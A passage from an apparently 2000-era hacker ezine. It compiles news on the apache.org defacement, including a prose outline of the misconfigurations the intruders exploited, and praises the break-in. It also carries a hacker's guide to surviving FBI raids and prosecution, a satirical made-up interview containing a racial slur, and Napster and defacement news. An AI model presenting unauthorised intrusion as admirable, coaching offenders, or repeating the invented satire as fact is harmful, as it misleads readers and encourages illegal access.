HWA.hax0r.news, ezine said the site was defaced around 6:37 p.m. EDT on
May 3 by hackers known as "{}" and "Hardbeat."
"{} belongs to Buffer Overflow Security, a fledgling security group
consisting of ex-hackers and including people such as "mixter," who wrote
TFN, the DDOS-distributed attack tool recently brought to light in the
media by denial-of-service attacks on major websites," the ezine
wrote.
A mirror of the defaced site can be found on the Attrition.org mirror site
and specific details of the break-in can be found on Apache's site.
"They came right out and admitted what had happened and said they were at
fault," said OpMan, a New York-based computer systems enthusiast, who
noted that "you won't see Microsoft taking the blame for the ILOVEYOU
debacle."
"This was a classy hack," Cruciphux said. "It ended almost like a fairy
tale. Although tracks were covered and logs cleared, it was decided to
alert the apache.org people about the condition and a meeting between the
intruders and Apache ensued. Not all defacings go this way, so
kiddies remember: It is still very illegal and risky to do this. Be
warned."
The Register;
http://www.theregister.co.uk/000506-000002.html
Posted 06/05/2000 7:47pm by Thomas C. Greene in Washington
Apache.org owned by white hats
Friendly strangers briefly took over the Apache Software Foundation server by
exploiting a series of common configuration errors, and then announced their
presence by inserting an advertisement for Microsoft at the bottom of the home page.
The open-source Apache is the most popular HTTP page server software currently in
use.
The intruders gained root access to Apache.org and could have done considerable
damage, including replacing the Apache software offered for download with versions
containing a Trojan which would have given them access to servers running all
subsequent copies downloaded from the Apache.org Web site.
In spite of the damage they could have done, they confined themselves to verifying
their exploits, fixing one hole in Apache.org's server configuration, and leaving behind
a harmless reminder. They also posted the full details of their exploits.
The intruders originally gained easy access via FTP, discovered a plethora of
world-writable directories (tsk, tsk), and installed a simple BIND shell which they could
execute remotely via Telnet and from which they learned what services were running
and the contents of most directories.
Apache.org was running the BugZilla bug-tracking software, which requires a Mysql
account. They found Mysql available locally and running as user root, though the
BugZilla documentation warns against running Mysql as root.
"We hacked www.apache.org because there are a lot of servers running apache
software and if www.apache.org got compromised, somebody could backdoor the
apache server source [code] and end up having lots of owned boxes," the intruders
said.
"We just couldn't allow this to happen, we secured the main ftproot==wwwroot thing.
While having owned root we just couldn't stand the urge to put that small logo on it."
The intruders, who go by the aliases {} and Hardbeat, showed a bit of purist pride.
"We didn't wanted [sic] to use any buffer overflow or some lame exploit; [our] goal was
to reach root with only configuration faults," they explained.
Apache.org took the exploit in the spirit in which it was meant. "They seemed friendly.
It would have been nice if they hadn't put the damned Microsoft logo up, but I guess
they had to do something to get attention," Apache Software Foundation director
Rasmus Lerdorf said in an interview with CNET.
"We can only blame ourselves. It's quite embarrassing, but it's a good little heads-up,"
Lerdorf reportedly said.
This has to qualify him as the kewlest corporate suit in the known universe. �
-=-
C|Net;
http://news.cnet.com/news/0-1003-200-1821155.html?tag=st.ne.1002.bgif.ni
Apache site defaced in "embarrassing" hacker attack
By Stephen Shankland
Staff Writer, CNET News.com
May 5, 2000, 12:45 p.m. PT
Intruders defaced the main Web site of the Apache Web server project this
week with a fake ad for a rival software package from Microsoft.
A group of intruders broke into the server by exploiting a series of
weaknesses, said Rasmus Lerdorf, a member of the Apache Software Foundation
board of directors and a programmer at Linuxcare. The intruders limited
themselves to inserting the Microsoft advertisement at the bottom of the
page, though they could have done much worse damage because they had gained
complete control over the computer, he said.
Because of the comparatively mild damage and the fact that the intruders
told Apache how their attack worked, Apache termed them "white
hats"--helpful hackers, not the more malicious "black hat" category.
"They seemed friendly," Lerdorf said. "It would have been nice if they
hadn't put the damned Microsoft logo up, but I guess they had to do
something to get attention."
The burgeoning number of computers on the Internet is vastly increasing the
opportunity for attackers looking for sites to break into. At the same
time, those computers also are storing more important information, such as
credit card numbers or corporate records.
Apache is software used on a server to deliver Web pages to Internet
browsers. It's the most commonly used Web server software, running on 60
percent of Web servers, according to a study by Netcraft. Microsoft's
Internet Information Server is in second place with 21 percent.
Apache, along with Linux, is among the best-known "open-source" programming
projects, in which anyone may see, modify and redistribute the software's
original programming instructions. Open-source projects typically are
developed by a core group of volunteers, but corporations are increasingly
involved as well. IBM and Sun Microsystems in particular have boosted
Apache.
The basic problem at Apache was that too many people could install whatever
software they wanted on the server, leading to vulnerabilities that stemmed
from the different pieces of software interacting, Lerdorf said. "We just
had too many people installing too many services on the box without
coordinating with each other," Lerdorf said.
Apache now has shut down two vulnerabilities that led to the attack and has
reduced the number of people who have control privileges, he said. In the
longer term, Apache will be splitting jobs across several servers, a
configuration that allows better security, Lerdorf said.
In a note posted to the Bugtraq security mailing list today, the intruders
described how they broke into the server.
Lerdorf said the first stage was that members of the public could store
software on the server after sending it with FTP software. The attackers
used this feature to save a small program on the machine that later could
be used to tell them what files were stored elsewhere on the system.
The intruders then discovered the server had the Bugzilla bug-tracking
software produced by Mozilla, the organization building America Online's
Netscape Web browser. A weakness in Bugzilla allowed the attackers to gain
complete control over the system, Lerdorf said.
Apache shut down Bugzilla completely and will either fix it or replace it
with other software, he said.
Lerdorf put a good face on the defacement. "We can only blame ourselves,"
Lerdorf said. "It's quite embarrassing, but it's a good little heads-up."
SlashDot;
Posted by jimjag on Thursday May 04, @11:23AM
from the strong-as-the-weakest-link dept.
Yesterday, due to system-level misconfigurations, www.apache.org was
defaced after a root-level breakin. Those responsible for finding the
holes and the ASF have been in cordial contact, and the holes have been
plugged. In the process of doing that, FTP and other services on
www.apache.org have been stopped. A mirror of the defaced site can be
found on the Attrition.org mirror site. Brian Behlendorf sent the
following to various Apache mailing lists:
Hi. We have been made aware (thanks to a very humorous banner ad for
Microsoft Back Office on the front of www.apache.org!) that our particular
configuration on www.apache.org of ftpd and bugzilla opened a security
hole that allowed someone from the outside to get a shell account, and
then get root. We have been in contact with those who found the hole, and
have closed up the misconfigurations that allowed this.
It is important to note that this is *not* a hole in the Apache web server
or related software products. I would encourage double-checking the PGP
signatures of Apache releases for the immediate future.
However, I do not believe we are out of the woods yet. Bugzilla has not
been thoroughly audited, and while I am not worried about ftpd, simply
having another deamon that can write files to the web server whose purpose
has been completely superceded by others suggests that taking it down for
good is the right idea.
So I am taking down FTP - something that should have been done long ago.
If there are FTP links on any of our pages (or on places like freshmeat)
they should be change to HTTP. There are enough high-quality text-mode
HTTP clients that there is no point to having it up, save for mirroring,
and we allow rsync and cvsup for that. I will be contacting the mirror
site admins list to communicate this.
Also, I have taken down all installations of bugzilla on apache.org until
it can be audited. I will be performing a first pass tonight over it, but
anyone else familiar with perl and willing to deal with rather ugly code
is welcome to do so as well. I will set it back up once I'm comfortable
there's been at least one reasonable pass over the whole codebase and any
obvious holes have been plugged. This is only life-support though; I
really don't think we should be using bugzilla once a suitable replacement
is found.
Finally, I think it can be said that this compromise was mostly due to a
lack of discipline on the part of those who had root and set up services
without considering the ramifications of the way they were installed. I
don't want to point fingers, since I'm probably at least as to blame as
others, but I do feel that the policy of giving root access to a larger
number of people than usual was probably a mistake. Along those lines,
I've changed the root password and removed everyone from group wheel but
myself - sorry to be fascist about this but I kinda feel like at the end
of the day it's my responsibility. We'll come up with a strategy soon
about granting sudo access to particular people for particular binaries so
that I don't become a bottleneck again.
The details will soon be posted to bugtraq. Thanks.
LinuxNews.com
Pow-Wow With Apache's Hackers
By Michelle Head
Can you be scalped nicely? Apache seems to think being red in the face
beats being red in the accounting department after an embarrassing
encounter with some clever and well-meaning hackers.
With the IT world still bobbing confusedly in the wake of the Microsoft
Outlook love bug, the Open Source Internet Servicer, which currently
runs over 60% of the Web sites on the Internet, was targeted by hackers
Friday. The intruders, who declined to damage or disrupt the site,
instead marked their trail with a modified Microsoft logo.
Shortly afterwards, the hackers described their harmless heads-up in
full detail on the Internet in a step-by-step tutorial, identifying
themselves as Hardbeat and {}. The site describes how configuration
errors allowed the two access to Apache--and how, instead of damaging
the site, they simply posted an amusing warning and secured the site
from other, less well-meaning prowlers on their way out.
Asked if this hack was meant to protect a major Open Source project,
Hardbeat responded, "We did this hack because we could. The possible
risks mentioned in the paper (Trojanning Apache source) were really an
afterthought. We did this because Apache.org is a high-profile site, and
these configuration problems are common. Therefore, defacing Apache.org
would be a great way to draw attention to these errors."
{} described his background. "I am a coder, everything I write (like a
Linux kernel security patch named auditfile) is Open Source," {}
volunteered. "I work at a local monkey zoo and at a Cable ISP." {}
intends to start formal training in computers next year.
Hardbeat's background in Open Source is less extensive. "I have written
one Open Source tool (http://www.dataloss.net/midentd). It's [available
under the GNU (GNU's Not UNIX) General Public License (GPL)] but the
next version will not be. It is also no longer maintained, because I am
too busy. In daily life, I go to University (I am in my first year of
Computer Science) and I have a job as a systems administrator/developer
at a big hosting company in The Netherlands. I have no professional
training," Hardbeat explained. "It's all experience."
Hardbeat commented on the hackers' choice of a Microsoft logo for their
marker. "Let's start by stating that that had no political meaning--we
were looking for a subtle way to show we had that kind of access,
without damaging anything or hindering people in their business at
www.apache.org," he wrote.
"We also figured that would draw a teensy little bit of extra
attention," he continued, "and you asking this question shows that it
does. :) Also note that this was not an official M$ logo," he added. "A
friend of ours who works as a graphic designer did this thing for us."
On whether Apache is their first (or last) mission, the happy hackers
have no comment. "If we have anything to share we will, but privacy is a
high good," Hardbeat explained.
Hardbeat and {} hoped Apache would have "the only correct reaction to
such a hack--to talk to the people who did it, and not sue them when
they had no bad intentions." The pair hoped to educate Apache rather
than upset them.
"Talk to them, ask them what they did and especially how they did it,"
Hardbeat advised. "That way they will stay friendly to you and help you
fix the problems in a quick and reliable way."
"Apache reacted above these hopes, being friendly and responsive,
complimenting us `you guys are clever!', `Good work, guys'" Hardbeat
reported.
Apparently Apache's director was grateful for the warning. "They seemed
friendly. It would have been nice if they hadn't put the damned
Microsoft logo up, but I guess they had to do something to get
attention," Apache Software Foundation director Rasmus Lerdorf said in
an interview with CNET. "We can only blame ourselves.
"It's quite embarrassing, but it's a good little heads-up,"
About the Author:
Michelle Head is an experienced author who decided to plunge into the
world of Linux journalism. Michelle is a new Linux enthusiast and is
excited about the Linux community. She welcomes feedback on her articles
and would love to hear ideas for future articles. She can be reached at
Michellh@LinuxMall.com.
@HWA
32.0 [IND] The Goat Files: mindphasr talks more about his bust.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(selected files from www.goat-security.org)
http://www.goat-advisory.org/texts/goat-gH-busted.txt
"Everything a hacker needs to know about getting busted"
part 2 by mindphasr (gH)
***note: Although g0at security mocks gH quite a bit, we still have some what
good relations with the busted mindphasr. I asked mindphasr to write something
like this for goat-advisory.org, instead it is being released under gH, we do
however have exclusive distro rights to this, thus the reason why it is up here....
..::gH Release 040900:..
..::mindphasr@attrition.org:..
* Converted from a scratch pad into a .txt file by John Welder a.k.a. "Ansle"
"EVERYTHING A HACKER NEEDS TO KNOW TO ABOUT GETTING BUSTED PART 2"
:PREFACE:
A. INTRODUCTION
B. THE RAID
C. CHARGES
D. GETTING A DEFENSE
E. INDICTMENT
F. PLEA AGREEMENTS
G. HEADING TO COURT
H. YOUR FUTURE
I. THE END
:PREFACE:
This file is being written for the sole purpose to be informative. I take no
responsibility for anything that is done with this file in mind. This file may be freely
copied to a bulletin board systems, text archives or print material. All I ask is proper
credits are given to the author(s). - mindphasr / April 5th 2000
A. INTRODUCTION
Now days, after very popular movies such as "Hackers" and "The Matrix" the hacker world has
much been glamorized as something most people will see as something very
interesting. However, what is not shown is the real consequences of what could happen in
the end. There have been so-called hacker groups popping up all over, many of which last
about as long as a 10 dollar bill laying on the road. In the past 5 years I have gone
through many things in the scene. I have seen people trusted by the community turn into
FBI informants, I have seen looked up to people in the scene turn into FBI informants, I
have also seen best friends turn their backs. This is all part of the so-called hacker
world. Many individuals these days will do anything they can to gain respect in the scene,
however many are unaware what may come of this. I have been through one of the most highly
publicized hacker incidents in the last decade, and unfortunately have also gone through
the court battles. The battles I hope this document will help most get through. However,
this document will be focused primarily on the legal issues involved and what to and to not
do. I write this with much respect for Agent Steal's 1997 file "Everything a hacker needs
to know about getting busted". I am going to go over some things that have not been covered
in his file. It is an excellent file, read it, read it many times. You may obtain his
text file at http://www.attrition.org/~modify/texts/scene/everything.busted.html . Enjoy.
B. THE RAID
This is probably when it will hit home for most of you. You may suddenly realize what you
have done is not so harmless. You will most likely be awakened from a sleep between
6am-9am. You will get to hear the infamous FBI knock. They knock louder than anyone you
have ever heard, you will know its them. If you do not open the door within a minute or so
they will not hesitate to open the door themselves. If you are in an apartment complex,
they will have a key. If you are at your home, they will have a bigger key that will knock
your door down. It will usually be a few FBI agents and then local law enforcement
'assisting'. They don't care if you're a 9 year old or a 40 year old. They do it all
the same. When they come in they will find you and grab you and drag you somewhere safe
where they can search you. In most cases that will be outside your apartment or
house. They will have their guns drawn, so doing something stupid at this point would not
be bright at all. They will then handcuff you and bring you back inside and set you down
on a couch or a nice chair. Get comfortable you may be sitting there awhile. An agent
will then proceed to tell you they are going to search you place, make sure you ask for the
search warrant. A key to look for here is who the warrant is written out to. In most cases
your local police will NOT have a warrant issued to them, do not let them go through
your stuff. Leave it to the FBI. There is actually a good reason for this, the FBI will
not and cannot issue citations for drugs, underage drinking, etc. If the police see it
they will write you up. You don't need that. They like to get sneaky and try to get you to
agree and make you think they have one. They will NOT always have one. After you overlook
the warrant, they will then proceed to tear your place apart. They will search everything,
I mean everything. In fire alarms, behind posters, in attic, under rugs, in refrigerator,
in tape decks, in your garbage. While the agents are executing the search one designated
agent will be there to try and get you to talk to them. You have heard it before and you
will hear it again many times: DO NOT SPEAK WITH ANY OF THEM, KEEP YOUR MOUTH SHUT! NOTHING
YOU SAY WILL DO YOU ANY GOOD. When you decide not to speak with them chances are they will
get a little testy. That's their problem. I suggest you do not say a single world while
they are there other than "May I see the warrant?" You don't have to; it's your right to
remain silent. In most cases they will not arrest you. They will leave. They will also
try and say bye to you and get you to call them back. This is a controversial situation,
some people say call them back and try to cooperate. However, in my experiences it gets
you nowhere. So don't bother. Before they leave, make sure you get a copy of the search
warrant and the "Search & Seizure" form. That form will allow you to get your things
back. If it is not written down on there, you will not receive them back. Check it over
before they leave.
C. CHARGES
In most cases after the raid you will not hear from the FBI for quite some time. Some
cases, never again. They tend to take their time. Charges will follow. They will be back
to execute yet another search warrant, however most cases this will have to be a voluntary
execution. They will most likely be back with a list of charges being brought
forward. They will then ask you if they can execute a search warrant. If you say no they
will say a cocky line such as "Oh, that doesn't matter we can get one within 1 hour, and we
will let the judge know you're not cooperating." This is the point where you may want to
cooperate somewhat. They can keep you in custody. They will arrest you and bring you in
front of the nearest Magistrate (which is a fancy term of a off dutiy judge). He will then
decide whether you should be kept in custody or not. In my case, I was brought downtown to
the courthouse and put in a real nice office and put on a teleconference with a Magistrate
and he discussed with the FBI agents if I should be kept in custody or not, and if not what
my conditions of release should be. This is where the agents may say you are not
cooperating. I was release on a signature bond and restricted from coming within 10 feet
of a computer.
D. GETTING A DEFENSE
Depending on your case, you are going to have to decide what kind of lawyer to get. In
federal cases there really is no such thing as "Public Defender". What they do is put
together a bunch of lawyers who would like to work federal cases to extend their
resumes. They then pick from a "hat" to come up with a lawyer to represent you. In my
case, I was hooked up with a very very nice lawyer. So therefore I did not have to go out
and spend my life savings on legal fees. However, you could get the so-called shaft and
get a sucky PD wannabe. In this case you are going to want to go searching for a lawyer
who has experience in this sort of law. Those kinds are becoming easier and easier to find
these days. Depending on your wallet you are going to want to find one you can afford and
yet still be able to eat afterwards.
E. INDICTMENT
This is sort of a downtime. You must wait for the Grand Jury to come back with an
indictment on your charges. This will happen 99% of the time. This is when the charges
are official. Most indictments will have extra charges tacked on that the government
themselves know they cannot prove. These will be used for "Plea Bargain" situations. Such
as "You plea to count 1 and 3, we will drop 2 and 4" You get the idea.
F. EVIDENCE
Be prepared, you are going to be surprised at what the government has on you, and your
'conspirators.' You are going to want to file a "Motion for Discovery" which will require
the government to hand over all their "discovery" materials. This will include photocopies
of paperwork obtained at their raids, stuff from others. Statements made by others against
you. And of course hardware. You get the point. The government will go over this very
closely and pick apart everything. They like to link everything together, even if its not
called for. They will do it. They will most likely go through your drives and link
together things to make you look like a monster. They will also pin you down as part of a
conspiracy if you are involved with more than one person, such as in my case. If you are
lucky they won't file addition conspiracy charges.
G. HEADING TO COURT
Once the indictment is presented, and then you have to make some very important
decisions. These could affect your future. First off, are you clearly guilty of the items
and can they be proven? If so, common sense tells you not to spend your life fortune to
hire a lawyer who will lie for you. In most computer cases there is substantial evidence
that is rather blatant. Such as phone logs that will shoe exactly what you did. If you
believe you are being targeted for things that cannot be proven. Go ahead fight it. In
most cases the government will try to tack on a few extra charges, which are rather
irrelevant and they know cannot be proven. However, these are used for plea bargain
situations. I will discuss that a bit more in the next section. So far, in this file I
have taken a much better look at Federal crimes. Since unfortunately that is all I have
personal experience in. In federal cases all court dates will be one of the Federal
Courthouses. You most likely will have to drive a ways to get to it. Each state has at
least two federal courthouses. This will vary depending on where you are.
F. PLEA AGREEMENTS
They will be offered. Sometimes they will be bad, sometimes they will be good. Do NOT
take the first one presented to you. This is usually an agreement, which lets the
government know how guilty you really think you are. They will offer more than one. If
you have a good lawyer he will be in contact with the US Attorney and will try to work
something more practical out. It happens in most cases. This is a very important thing to
think about. If do not accept a plea agreement, then you can risk your case in
court. However if you loose, you may be wishing you had accepted an agreement. You can't
go back and accept it later. Think about this, think about this long and hard. If you
decide to accept one, make sure you read the WHOLE agreement over, several times. They
like to hide things in there. Be careful of what you sign.
G. SENTENCING
Let's skip ahead here. Lets say you are found guilty of something. Then the next phase is
sentencing. This can be a wreck to most people and their families. Sentencings in federal
cases go by the United States Sentencing Guidelines aka U.S.S.G. It is a point scale. They
will take your criminal history, your cooperation, the damage caused, i.e. and add points
up and minus points off. They will come up with a number. This number will decide the
sentencing range. In my case there was quite a problem with this. My lawyers added up a
number of 8. The government had a number of 9. Because of the disagreement on damage
caused. The 1-point difference was about 5 months different in imprisonment. The judge
has the discression to not use the point system. However, my case was sort of a precedent
being set. If the point were 8, I would have gotten 0-6 months. However, the minimum
sentence in the code for the sub Section 1030 crime was 6 months. So that caused a
problem. Could the judge go less than 6? He clearly could according to the U.S.S.G. but
not according to the law. He elected to rule out the points, and go with the book. I was
given 6 months. The very minimum. Even though the government was looking for 28 months
:) The judge may also decide where to put you. In my case I was sentenced to a Federal
Half-Way house. I was lucky, there was room and I did not have to spend anytime in a
Federal Prison. I have not been to the halfway house yet however, so I will leave
information on that to be put in a revision down the road.
H. YOUR FUTURE
Now, after your sting in the Federal holding center. You will most likely be not allowed
to speak with any of your ex-friends. Not use a computer. Let all employers know of your
past. Be on probation. Not be allowed to profit from your story. All these things come
as part of your sentence. You will have to report to a probation office, be drug
tested. Have to contact her of any police contacts, if you are leaving your district. It
will not be fun. I got the maximum probation, which is 3 years for my case. I will deal
with it. If I can I'm sure you can :)
I. THE END
Well, I hope this was a help to you. This along with Agent Steals text I am sure you can
get a very good understanding of the whole situation. I am not here to tell what to and
not to do. Remember, I have gone through it. I know how it is. If you are going to do
these activities please remember these things. As long as you talk to the right people
(Stay away from John Vransevich @ AntiOnline, Carolyn Meinel @ HappyHacker) and be very
careful when you do things. Slipping up once, may make these text files reality.
I admire and respect the following people and organizations very much for their friendship
and help over the past 5 years, you have been a big part of my life whether you know it or
not:
Organizations: Global Hell(gH), cha0s inc., Cult of the Dead Cow, h4gis, l0pht, Attrition,
Hacker News Network, Pure Security Networks, Help Net Security, 100% Bikkel(RIP), Defcon,
Rootfest, 2600-gb2600, FinalDream inc.,
Individuals: MostHateD, altomo, Zyklon, Taylor, shekk, Debris, ech0, Jericho, McIntyre,
flesh, obsolete, LoopHole, aeonflux, SoulBlaze, Rewn, Kuruption, Cryzydopey, diesl0w,
socked, spacerog, Agent Steal, Kevin Mitnick, Ted Bridis, Brock Meeks.
@HWA
33.0 [IND] The Goat Files: "Hackers unite - a goat security expose"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(selected files from www.goat-security.org)
04/24/00
///////////////////////////////////////////
GGGGGG OOOOOOO AAAAAAAA TTTTTTTTTT
G O O A A TT
G GGG O O AAAAAAAA TT
G G O O A A TT
GGGGGG OOOOOOO A A TT
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
[g0at] http://www.goat-advisory.org [g0at]
-=g0at media productions=-
((Hackers unite))-((A goat security expose))
In a most terrifying move by the biggest names in the underground community,
representatives of Global Hell (gH), the Shot Down Crew (sDc) and
the Brotherhood of Warez (BoW) have announced a merger making them the biggest and
more powerful hacker group the Eris Free net's IRC network has ever seen.
g0at security [http://www.goat-advisory.org] has taken upon itself the mission of
getting to the bottom of this alarming event and discovering the reasoning behind it.
Recently, a member of g0at security visited Global Hell leader, Patrick Gregory
(aka Mosthated) in his new home, a United States federal penitentiary where he is
serving 5 years. Upon entering the prison library, where we were to interview Gregory,
we found him sitting on the lap of another inmate tapping away at the keyboard of the
prison computer. When asked what he was working on, Gregory replied saying that he had
recently reformatted the computer and installed the latest version of Linux Mandrake as
opposed to Microsoft Windows 95 since microsoft products are lame. He then went on to
tell us that to occupy time in prison, he has downloaded Microsoft Visual Basic 6 and
has been running it with the latest version of Wine in the KDE environment. A full interview
follows.
GS - g0at security
MH - Patrick Gregory
GS: Can you confirm a merger between Global Hell and other well known underground groups?
MH: Yes, Global Hell is merging with two other group.
GS: What groups are these?
MH: The Shot Down Crew and the Brotherhood of Warez.
GS: What is the reasoning behind this merger?
MH: Well as you may know, since the FBI investigation commenced in the Summer of 1999,
gH has slowly been dying out. Many of our members have taken off in fear of being
raided, some were arrested, and gH's two leaders are now serving time. We have lost
our stronghold on the internet and we must regain this in order to show the public
stability in our organization.
GS: Why is stability in Global Hell required for the general public to see?
MH: The gH ran security site (http://www.pure-security.net) has been growing
gradually over the past half year and we need to raise some capital in
order to increase our expansion. Pure Security Networks, is announcing that
it has filed to go public (IPO) in May of 2000.
GS: An IPO? Please expand on this...
MH: Well, May 23 2000, Pure Security Networks under the symbol of PSN, will be trading
on the Nikkei 225. Common shares will start a $0.32, no preffered shares are
being offered.
GS: During this expansion of Pure Security Networks, what new services will be offered?
MH: Well we have negotiated a contract with the government of Zaire to offer internet
connectivity to local schools. Also we plan on beginning mutual fund and retirement
consultations along with helping script kiddies create investment portfolios.
g0at security then went on to get the Smack Down Crew's side of the story. g0at security
found members of the group on the James Joyce appreciation BBS located in Dublin, Ireland.
When asked about the merger and various questions related to the IPO, sDc representatives
respond with the same uniform answer, "Whachoo talkin bout foo". They then went on ranting
about how they own goats. They ended the interview with a very befuddled quote. "Dem goats
better rememba somethin foo, mess with the best, die like the rest". We were then expelled
and banished for life from using the James Joyce appreciation BBS.
Finally, g0at security went on to get the story from the Brotherhood of Warez. g0at security
met with a member of the group, sw_r on a popular IRC channel, #solace on efnet which
appeared to have been taken over by some goats. When asked about the reasoning behind
the merger and IPO, he went on to quote us this:
"Back in the day, I was a member of the MOST elite hacker group ever, the Masters of Deception.
MOD was so much more elite then LOD. FUCK the LOD, they should all rot in hell. God I hate
Eric Bloodaxe, that neegro is going to get it. Friggin hick, show them texas boys what I'm made
of. Anyways, a book was written about the MOD and how we kicked the LOD's asses! Those stupid
authors (Michele Slatalla and Joshua Quittner) didn't include me in their friggin book! They
should DIE! I own them. I own them all. So with this IPO, I hope to buy out the Harperperennial
Library and ruin those damned authors carriers. I'll show them who the elite one is. Not
that twirp PhiberOptik, I own his ass. I'll school him in DNS anyday".
g0at representatives then proceeded to back away very slowly until there was enough distance
for us to run away, fast, very fast.
Call your brokers folks, this hot new IPO is expected to rise, fast, very fast. In final notes,
this new group being dubed, the Planet Hackers Club should not be messed with. Already they have
waged war with other groups such as DevilSoul and the Pakistan Hackers club. Routers everywhere
are in major trouble. We hoped this expose was helpful and informative and all further questions
should be direct to members of this new merged group.
@HWA
34.0 [MM] Napster boots 317,377 users
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"So, what the heck is Napster?
Napster is a completely new way of thinking about music online.
Imagine...an application that takes the hassle out of searching for MP3s.
No more broken links, no more slow downloads, and no more busy, disorganized
FTP sites. With Napster, you can locate and download your favorite music in
MP3 format from one convenient, easy-to-use interface."
- From the Napster site.
ZDNet news;
http://www.zdnet.com/zdnn/stories/news/0,4586,2566773,00.html
Napster boots 317,377 users
Earlier this month, Metallica presented Napster with a list of users who it
claimed had violated the band's copyrights.
By Margaret Kane, ZDNet News
UPDATED May 10, 2000 9:58 AM PT
Online music vendor Napster Inc. said it has removed 317,377 users who have
been accused of violating copyrights off its Web site.
The action was taken in response to a request from heavy metal band
Metallica, which filed suit against Napster in April. Last week Metallica
presented Napster with a list of users who it claimed had violated the
band's copyrights.
The band provided Napster with a list of user names; file names of
allegedly infringed music for each user; and the time, date and IP address
of the Napster server to which the user was connected. The list did not
contain IP addresses of the users.
Rapper Dr. Dre announced Wednesday he will submit names to Napster for
removal from the system, according to attorney Howard King, who also
represents Metallica.
Napster's technology allows users to copy digital music files from one
another.
"We intend to fully comply with the DMCA (Digital Millennium Copyright
Act) and our policies," reads a statement posted on the Napster site. "We
will take down all users Metallica has alleged, under penalty of perjury,
to be infringing."
The company said users who feel they have been banned by mistake will be
given the opportunity to submit a "counter notification" form.
Metallica obtained the users' IDs by monitoring the service over a two-day
period. Napster said it did not give Metallica personal information, such
as names and addresses, about the users who have been kicked off.
Metallica's attorney said last month that the band submitted the names at
Napster's request.
Dr. Dre also filed suit against Napster last month.
The ban will only extend to users who shared versions of commercially
released songs and would not apply to "bootleg" recordings made at
concerts.
Marilynn Wheeler, ZDNet News, contributed to this report.
Napster's Press Release:
~~~~~~~~~~~~~~~~~~~~~~~
http://www.napster.com/metallica-notice.html
Information About Metallica's Request To Disable Napster Users
On Wednesday, May 3, 2000, Napster received a delivery from the band
Metallica of 13 boxes of paper notifying us of Napster users alleged to be
infringing Metallica and its related entities' copyrights. On Thursday
afternoon, May 4, Metallica sent computerized lists of 317,377 Napster
user names alleged to be infringing Metallica's copyrights. Metallica has
requested that, in compliance with the notice and takedown policies
outlined in the Digital Millennium Copyright Act ("DMCA"), Napster act
expeditiously to disable all of these users.
We intend to fully comply with the DMCA and our policies. We will take
down all users Metallica has alleged, under penalty of perjury, to be
infringing.
Conversely, the DMCA affords certain protections to users. Namely, a user
who is banned from the service deserves the opportunity for reinstatement
in the event that there has been a genuine mistake or misidentification of
the materials made available by that user. Users who feel they have been
banned as a result of a mistake or misidentification of content may submit
a "counter notification" form.
The Napster software will direct all users barred as a result of
Metallica's allegations to an infringement notification page. That page
explains the notice that Metallica has given us, explains who Metallica
has stated to us it intends to block, and gives the user an opportunity to
submit a counter notification if the user has been misidentified. If the
user has been misidentified, and requests to be reinstated by submitting a
counter notification under penalty of perjury, then, unless Metallica
chooses to pursue legal action against that user within 10 working days of
being notified of that user's counter notification, the user is entitled
to be reinstated.
We at Napster respect the privacy rights of our users. We currently keep
our users' personal information, including personal names, e-mail
addresses, street address, or other data separate and distinct from users'
Internet activities. That information was not disclosed to Metallica, or
to its related business entities Creeping Death Music, or E/M ventures, or
any other entity. Napster collects information at registration solely for
the purpose of better understanding who its audience is. Of course, if you
subsequently send Napster e-mails, other correspondence, or a "counter
notification" that identifies both your user name and your real name or
e-mail address, that information does become recorded in combination.
Because of the methods employed by Metallica in assembling its list of
usernames, it is possible that users have been mistakenly implicated as
infringing the copyrights of songs and recordings originally included on
commercially released Metallica albums. It is also possible that Metallica
has correctly identified many users. Napster will reinstate those users
who dispute Metallica's allegation of infringement via a sworn "counter
notification" stating that they have not shared the materials to which
Metallica objects, and who, after submitting the counter notification, are
not made the subject of legal action by Metallica within ten (10) working
days after Metallica is notified of that person's identity.
Frequently Asked Questions About Metallica's Request (FAQs)
Q: What information has Napster received from Metallica?
A: Metallica delivered a computerized list of 317,377 distinct usernames
to be banned from Napster. The list contained usernames, filenames of
allegedly infringing music for each user, time, date, and the IP address
of the Napster server to which the user was connected. That information
did not contain the user's IP address or personal information. Metallica
has stated that it intends to limit the scope of its notification to
commercially released Metallica albums, making "no claim of infringement
with respect to recordings of songs made by fans at Metallica live
concerts."
Q: How has Napster responded to this request?
A: As a DMCA compliant service, Napster feels strongly that it is
important to expeditiously remove users alleged with copyright
infringement. Napster has blocked all users identified by Metallica
as allegedly infringing, based on Metallica's sworn allegations against
these usernames. If, but only if, these users feel that they have been
identified in error, they have recourse through our counter notification
policy.
Q: Has Metallica requested any personal information related to Napster's
users?
A: No, and no such information has been provided to them.
Q: What does Napster do with personal information provided at
registration?
A: Napster archives personal information, such as user addresses,
e-mail addresses, and the like, to use as general demographic
information for audience measurement purposes. We do not currently
associate a user's personal information with their Napster username.
Copyright 1999-2000 Napster, Inc. All rights reserved.
@HWA
35.0 [MM] ytcracker busted for web defacement
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.gazette.com/daily/top3.html
Teen accused of raiding city Web site
By Danielle Nieves/The Gazette
Edited by Mike Braham; headline by Gary Houy
A 17-year-old Colorado Springs boy
was charged in juvenile court
Tuesday with one count each of
computer crime and criminal mischief
after he broke into the city's Web
site in October and replaced it with
the message, "i love this city
ytcracker 9d9 palmer high."
The two felony charges carry a maximum penalty of two
years of juvenile detention.
The boy, known online as "ytcracker," said he is a
benevolent hacker who was trying to alert officials of
potential security glitches.
After discovering he had tapped into the city's Web site
in October, Colorado Springs police began an
investigation and said he had tampered with at least 40
other Web sites, including Airspace USA, Altamira
International Bank, Nissan, Honda, the U.S. Geological
Survey Monitoring Station and the Texas Department of
Public Safety.
In December, not knowing of the investigation,
"ytcracker" contacted the National Aeronautics and
Space Administration and told them he had meddled
with their Web site.
The agency teamed with Springs police, the Defense
Criminal Investigative Service, the NASA computer crime
division and the Texas Department of Public Safety to
gather information that led to the felony charges.
"I never had any intentions of doing damage," he said.
"At first it was funny, and then I wanted to alert people
to the security vulnerabilities in everyday software - and
the fact that no one is immune."
The boy said what began as a joke last summer turned
